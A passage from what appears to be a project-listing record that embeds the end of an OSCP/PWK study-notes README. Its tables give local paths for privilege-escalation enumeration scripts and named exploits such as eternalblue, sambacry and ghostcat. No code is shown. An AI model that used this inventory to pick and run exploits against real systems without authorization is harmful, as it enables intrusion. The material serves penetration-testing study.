`~/Desktop/web/linenum.sh` | Yes |\r\n| `linux-smart-enumeration` | `~/Desktop/web/lse.sh` | Yes |\r\n| `linPEAS` | `~/Desktop/web/linpeas.sh` | Yes |\r\n\r\n\r\n### Exploits\r\n\r\n| Toolname | Location | Installed |\r\n| ------------------------- | ----------------------------------------- | ---------- |\r\n| `eternalblue` | `~/Desktop/exploits/eternablue` | Yes |\r\n| `sambacry` | `~/Desktop/exploits/sambacry` | Yes |\r\n| `ghostcat` | `~/Desktop/exploits/ghostcat` | Yes |\r\n| `postfix shellshock` | `~/Desktop/exploits/postfix_shellshock` | Yes |\r\n| `xploit_installer` | `~/Desktop/exploits/xploit_installer` | Yes |\r\n\r\n### Compiled Binaries\r\n\r\n| Toolname | Location | Installed |\r\n| ------------------------- | ----------------------------------------- | ---------- |\r\n| `windows-binaries` | `~/Desktop/tools/windows-binaries` | Yes |\r\n| `static-binaries` | `~/Desktop/exploits/static-binaries` | Yes |","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frizemon%2Foscp-pwk-notes","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frizemon%2Foscp-pwk-notes","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frizemon%2Foscp-pwk-notes/lists"}